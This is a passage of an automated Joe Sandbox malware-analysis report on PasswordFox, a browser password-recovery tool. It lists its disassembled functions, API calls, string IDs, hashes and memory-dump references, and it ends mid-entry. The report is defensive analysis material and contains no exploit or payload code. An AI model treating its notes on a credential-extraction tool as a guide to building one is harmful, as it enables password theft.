                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpywcslen$_snwprintfmemset
                                        • String ID: %s (%s)
                                        • API String ID: 3979103747-1363028141
                                        • Opcode ID: 5c101a1717d761a794b4a47935445535065bc458e323c29de6e27173c3d94f1c
                                        • Instruction ID: f86e3ccb55b9338e549465bc076e66811fed7a5bdf8c9a07788a6878919dd802
                                        • Opcode Fuzzy Hash: 5c101a1717d761a794b4a47935445535065bc458e323c29de6e27173c3d94f1c
                                        • Instruction Fuzzy Hash: 49112C72800209EBCF61DF95C845E8AB7B9FF44308F1184BAE944B7152EB74A7598BD8
                                        Function 00405B4D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00405B72
                                        • GetDlgCtrlID.USER32(?), ref: 00405B7D
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 00405B94
                                        • memset.MSVCRT ref: 00405BBB
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 00405BD2
                                        • _wcsicmp.MSVCRT ref: 00405BE4
                                          • Part of subcall function 00405A25: memset.MSVCRT ref: 00405A38
                                          • Part of subcall function 00405A25: _itow.MSVCRT ref: 00405A46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: 538cbd483b61a964058767800756a2ba6769951f459bf2ef98068abb1200db1f
                                        • Instruction ID: 5de72342b8da513a90488bf833bb40f5844d3311299e0a82bf0f1c6b52723e7a
                                        • Opcode Fuzzy Hash: 538cbd483b61a964058767800756a2ba6769951f459bf2ef98068abb1200db1f
                                        • Instruction Fuzzy Hash: C7115432940119BADB14EB91DD8AEAB777DEF04750F0041B6F918F2192E7349A41CB99
                                        Function 00402E51 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402EF9
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402F0C
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402F21
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402F39
                                        • EndDialog.USER32(?,00000002), ref: 00402F55
                                        • EndDialog.USER32(?,00000001), ref: 00402F6A
                                          • Part of subcall function 00402C12: GetDlgItem.USER32(?,000003E9), ref: 00402C1F
                                          • Part of subcall function 00402C12: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00402C34
                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00402F82
                                        • SetDlgItemInt.USER32(0000009B,000003ED,?,00000000), ref: 0040308E
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Item$Dialog$MessageSend
                                        • String ID:
                                        • API String ID: 3975816621-0
                                        • Opcode ID: 9a1194d8446d2ee8c2c2fe6142bd65d3812135b4d2a6d970a0f87a6f4731ce56
                                        • Instruction ID: ea103f826b137b8a60ac69dd4fbb170abf4acf366394c0b9c5b180a58cd06299
                                        • Opcode Fuzzy Hash: 9a1194d8446d2ee8c2c2fe6142bd65d3812135b4d2a6d970a0f87a6f4731ce56
                                        • Instruction Fuzzy Hash: 4661B530200606AFDB21AF25CE89A1AB3B5EF54354F00C13FF915A66E1D7B8A991DB49
                                        Function 0040309E Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004030AE
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004030CA
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 004030F0
                                        • memset.MSVCRT ref: 00403100
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 0040312F
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 0040317C
                                        • SetFocus.USER32(?,?,?,?), ref: 00403185
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403195
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: e8135483db3ba8e4ac7329a3faff6584c00822408e7d482bedcdc92fe8be434f
                                        • Instruction ID: f95a6003199faa47c3198fe3a90fdd0791e5989fa17c62b28b46d5f40ed3ca29
                                        • Opcode Fuzzy Hash: e8135483db3ba8e4ac7329a3faff6584c00822408e7d482bedcdc92fe8be434f
                                        • Instruction Fuzzy Hash: 6E31B3B1500605AFDB249F29C885D1AFBA8FF08318B14853FF519EB2D1DB78ED408B98
                                        Function 0040823E Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040825D
                                        • GetWindowRect.USER32(?,?), ref: 00408273
                                        • GetWindowRect.USER32(?,?), ref: 00408286
                                        • BeginDeferWindowPos.USER32(00000003), ref: 004082A3
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004082C0
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004082E0
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 00408307
                                        • EndDeferWindowPos.USER32(?), ref: 00408310
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
                                        • Opcode ID: c8802fdd1d6b54d7263be30d962e9b56158ce9678fc0b2fa05ca925f4f816db0
                                        • Instruction ID: 576c8ee5cd9fe0ad8acbf0a33c8371cf80dfc0d116c28f559261c9bb12ca8a9e
                                        • Opcode Fuzzy Hash: c8802fdd1d6b54d7263be30d962e9b56158ce9678fc0b2fa05ca925f4f816db0
                                        • Instruction Fuzzy Hash: 5521C572940209FFEB118FA8CE89FEEBBB9FB48300F104164EA55B6165C73169519F24
                                        Function 00402CDE Relevance: 10.6, APIs: 7, Instructions: 123windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00402CF5
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00402D0E
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00402D1B
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00402D27
                                        • memset.MSVCRT ref: 00402D8B
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 00402DC0
                                        • SetFocus.USER32(?), ref: 00402E44
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: 53ac9e94c51787f32452e3a1c56351e6c6f078232db4eca64ed623f35229ca7d
                                        • Instruction ID: 052c0cda838f63c4f563090851bace12a4a9b305ff2841cbfeb83369681a13eb
                                        • Opcode Fuzzy Hash: 53ac9e94c51787f32452e3a1c56351e6c6f078232db4eca64ed623f35229ca7d
                                        • Instruction Fuzzy Hash: 0C413C71D40209AFDB209F95CC89DAFBBB9EF84704F00806AF914B62D1D7B59A81CF64
                                        Function 00406F1C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00404248: wcslen.MSVCRT ref: 00404255
                                          • Part of subcall function 00404248: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00407299,?,<item>), ref: 00404264
                                        • wcscat.MSVCRT ref: 00406FEB
                                        • _snwprintf.MSVCRT ref: 00407012
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite_snwprintfwcscatwcslen
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 2451617256-4153097237
                                        • Opcode ID: c454589146015d334ffcbe0a59ab454432961cc649d79cde94252bf8e64ce21d
                                        • Instruction ID: 35be35a740fbf3f9af44323595bc580f42b00a08e837909b78072e179b2ac8d4
                                        • Opcode Fuzzy Hash: c454589146015d334ffcbe0a59ab454432961cc649d79cde94252bf8e64ce21d
                                        • Instruction Fuzzy Hash: 1F31BE31900209EFDF14AF54CC86AAE7BB5FF44320F1141AAF905BB1D2DB35AA51DB94
                                        Function 00405C0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 00405C32
                                          • Part of subcall function 00405A5C: GetMenuItemCount.USER32(?), ref: 00405A72
                                          • Part of subcall function 00405A5C: memset.MSVCRT ref: 00405A91
                                          • Part of subcall function 00405A5C: GetMenuItemInfoW.USER32 ref: 00405ACD
                                          • Part of subcall function 00405A5C: wcschr.MSVCRT ref: 00405AE5
                                        • DestroyMenu.USER32(00000000), ref: 00405C50
                                        • CreateDialogParamW.USER32(?,?,00000000,00405C07,00000000), ref: 00405C9F
                                        • memset.MSVCRT ref: 00405CBB
                                        • GetWindowTextW.USER32(00000000,?,00001000), ref: 00405CD0
                                          • Part of subcall function 00405893: _snwprintf.MSVCRT ref: 004058B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountCreateDestroyDialogInfoLoadParamTextWindow_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 4269739968-4135340389
                                        • Opcode ID: f73843e745a1ea6c25bab0232a1fa7f078bf352206eacf97233f420d47e2a5dc
                                        • Instruction ID: ea41548d20c298312d9a3600ca5ecf469101e2f61b1c62bcd5fb009afbe77744
                                        • Opcode Fuzzy Hash: f73843e745a1ea6c25bab0232a1fa7f078bf352206eacf97233f420d47e2a5dc
                                        • Instruction Fuzzy Hash: 63218D32500718ABEB21AF90DD89EAB3B68EF04724F00447AFA05B51D1D7789990CF9D
                                        Function 00405A5C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: a01579805b91164820cc06d4f52803fad3590dbefd0a9a946776ca8aa64eda71
                                        • Instruction ID: 03f7240b8ad5432af4937c379df24f43008473f7ce2a450f7a211f7211f411be
                                        • Opcode Fuzzy Hash: a01579805b91164820cc06d4f52803fad3590dbefd0a9a946776ca8aa64eda71
                                        • Instruction Fuzzy Hash: F2219F32609344ABD720DF55D88599BB7F8FB85754F000A3FF584A6280E775A900CF9A
                                        Function 0040616E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406114
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406122
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406133
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 0040614A
                                          • Part of subcall function 00406108: ??3@YAXPAX@Z.MSVCRT(?,?,?,00406332), ref: 00406153
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00408C9B), ref: 00406189
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00408C9B), ref: 0040619C
                                        • ??3@YAXPAX@Z.MSVCRT(00000001,?,00408C9B), ref: 004061AF
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00408C9B), ref: 004061C2
                                        • free.MSVCRT ref: 004061FB
                                          • Part of subcall function 00404EAB: free.MSVCRT ref: 00404EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID: ]`@
                                        • API String ID: 2241099983-2281983686
                                        • Opcode ID: a8eaa75861c13603f906994c792d9cc59cc16d12ede48035b343848c37b4e623
                                        • Instruction ID: a9c116e93d7fad59cadb6f647f5786c16ed4b2935e15555091a30804ff2c02a1
                                        • Opcode Fuzzy Hash: a8eaa75861c13603f906994c792d9cc59cc16d12ede48035b343848c37b4e623
                                        • Instruction Fuzzy Hash: 91012A326019215FC626AB2AA40151FB395AFC5724316867FE5067B2C3CB3CBD6286DD
                                        Function 004049CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: 9eca9d0b10237597fc9396d76d6297696b5541b571abcc563b9e9d3cce03d77f
                                        • Instruction ID: a63f881caffbf41192db8e968fa5f05687683fdc3c35f7425c360209daf064b8
                                        • Opcode Fuzzy Hash: 9eca9d0b10237597fc9396d76d6297696b5541b571abcc563b9e9d3cce03d77f
                                        • Instruction Fuzzy Hash: 670128B2A4031866E720A715DC82BBA33A8EB80718F10403FFD14B51C3E77C9A445ADC
                                        Function 00405893 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _snwprintfwcscpy
                                        • String ID: dialog_%d$general$menu_%d$strings
                                        • API String ID: 999028693-502967061
                                        • Opcode ID: 84e63c119beed4f1fe873e09af5c8c3eece1eff9fee71dcad7d9760d50727fc8
                                        • Instruction ID: c3200807cc0debfc939cee5eb3075dce034f03707918156f2bcd07755b693721
                                        • Opcode Fuzzy Hash: 84e63c119beed4f1fe873e09af5c8c3eece1eff9fee71dcad7d9760d50727fc8
                                        • Instruction Fuzzy Hash: 15E08627785704B6EC2472815CC3F272151DA94B18F708977FD03B01D2A6BD99647E0F
                                        Function 0040A247 Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00409D28,00000000,00000000), ref: 0040A282
                                        • memset.MSVCRT ref: 0040A2E4
                                        • memset.MSVCRT ref: 0040A2F4
                                          • Part of subcall function 0040A161: wcscpy.MSVCRT ref: 0040A18A
                                        • memset.MSVCRT ref: 0040A3DF
                                        • wcscpy.MSVCRT ref: 0040A400
                                        • CloseHandle.KERNEL32(?,00409D28,?,?,?,00409D28,00000000,00000000), ref: 0040A456
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3300951397-0
                                        • Opcode ID: 1aac800793d7697f8501231e134039336fc3542f8421396ecca85bb1d798685a
                                        • Instruction ID: a0d3937577748f7fa85e333ee16ff121f7334b4792027423a0c830bdf408a501
                                        • Opcode Fuzzy Hash: 1aac800793d7697f8501231e134039336fc3542f8421396ecca85bb1d798685a
                                        • Instruction Fuzzy Hash: D6513D71108344AFD720EF65D888A9FB7E8FB84704F004A3EF989A2291D7B5D915CB5B
                                        Function 004086EF Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00408711
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 00405430
                                          • Part of subcall function 004053F1: LoadStringW.USER32(00000000,00000006,?,?), ref: 004054C9
                                          • Part of subcall function 004053F1: memcpy.MSVCRT(00000000,00000002), ref: 00405509
                                          • Part of subcall function 004053F1: wcscpy.MSVCRT ref: 00405472
                                          • Part of subcall function 004053F1: wcslen.MSVCRT ref: 00405490
                                          • Part of subcall function 004053F1: GetModuleHandleW.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00402460,PasswordFox), ref: 0040549E
                                          • Part of subcall function 00404C22: memset.MSVCRT ref: 00404C43
                                          • Part of subcall function 00404C22: _snwprintf.MSVCRT ref: 00404C71
                                          • Part of subcall function 00404C22: wcslen.MSVCRT ref: 00404C7D
                                          • Part of subcall function 00404C22: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404C95
                                          • Part of subcall function 00404C22: wcslen.MSVCRT ref: 00404CA3
                                          • Part of subcall function 00404C22: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 00404CB6
                                          • Part of subcall function 00404A67: wcscpy.MSVCRT ref: 00404ACD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: f9cd166552c099a29173546b1dd476264746e7da0406f7bb88c78ac6c0d5a1c7
                                        • Instruction ID: b8a29bba018f662f73a470a1f6c8031c9501d499ab0ea12e808dd2b79b7f1b63
                                        • Opcode Fuzzy Hash: f9cd166552c099a29173546b1dd476264746e7da0406f7bb88c78ac6c0d5a1c7
                                        • Instruction Fuzzy Hash: C4212FB1D00619DBCB40DFAAD8816DEBBB4FB08344F10417AF908B7281DB785A458F99
                                        Function 0040883C Relevance: 9.1, APIs: 6, Instructions: 59fileclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00408856
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408868
                                        • GetTempFileNameW.KERNEL32(?,0040CFA4,00000000,00000000), ref: 0040888B
                                        • OpenClipboard.USER32(00000000), ref: 004088B5
                                        • GetLastError.KERNEL32 ref: 004088CE
                                        • DeleteFileW.KERNEL32(00000000), ref: 004088ED
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1743720176.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.000000000040F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743739038.0000000000411000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743799089.0000000000416000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                        • Associated: 0000000B.00000002.1743819346.0000000000417000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_PasswordFox.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        • Opcode ID: 0d439ffa7403bd6a08bb45c8a3cbc549325788cddd5a42741ac006f5ebea398b
